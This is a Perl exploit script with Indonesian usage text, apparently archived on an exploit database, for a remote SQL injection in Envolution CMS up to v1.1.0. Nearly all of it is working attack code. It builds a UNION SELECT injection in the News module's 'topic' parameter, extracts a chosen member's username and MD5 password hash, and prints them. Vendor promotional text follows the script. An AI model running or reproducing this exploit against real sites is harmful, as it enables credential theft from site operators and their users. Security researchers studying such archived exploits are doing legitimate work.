#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
if(@ARGV < 3)
{
usage();
exit();
}
$site = $ARGV[0]; # Site Target
$path = $ARGV[1]; # Path direktori envolution_1-0-1
$usid = $ARGV[2]; # member id
$www = new LWP::UserAgent;
$sql = "$site/$path/modules.php?op=modload&name=News&file=index&catid=&topic=2%20and%201=2%20union%20all%20select%201,2,3,concat(pn_uname,0x3a,pn_pass)%20from%20envo_users%20where%20pn_uid=$usid/*";
print "
[~] Mencari Username:Password(md5) member id = $usid
";
$res = $www -> get($sql) or err();
$res -> content() =~ /<b>(.*)</b>/ or err();
print "
[+] Username:Password(md5) member id = $usid
";
print "
[>] $1
";
sub usage()
{
print "#############################################################
";
print "# newhack[dot]org #
";
print "#############################################################
";
print "# Envolution <= v1.1.0 Remote SQL Injection #
";
print "# http://sourceforge.net/projects/envolution #
";
print "# k1tk4t - newhack[dot]org - Indonesia #
";
print "# cara penggunaan: enov.pl [site] [path] [member id] #
";
print "# contoh: enov.pl http://localhost /html 2 #
";
print "#-----------------------------------------------------------#
";
print "# Thanks to; str0ke, xoron, y3dips, #
";
print "# newhack[dot]org staff dan member #
";
print "# mR.opt1lc,fusion,PusHm0v,Ghoz,fl3xu5,bius,iind_id,slackX #
";
print "# Semua Komunitas Hacker dan Sekuriti Indonesia; #
";
print "#############################################################
";
}
sub err()
{
print "
[-] Exploit gagal :( - cari yang lain!";
exit();
}
# sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation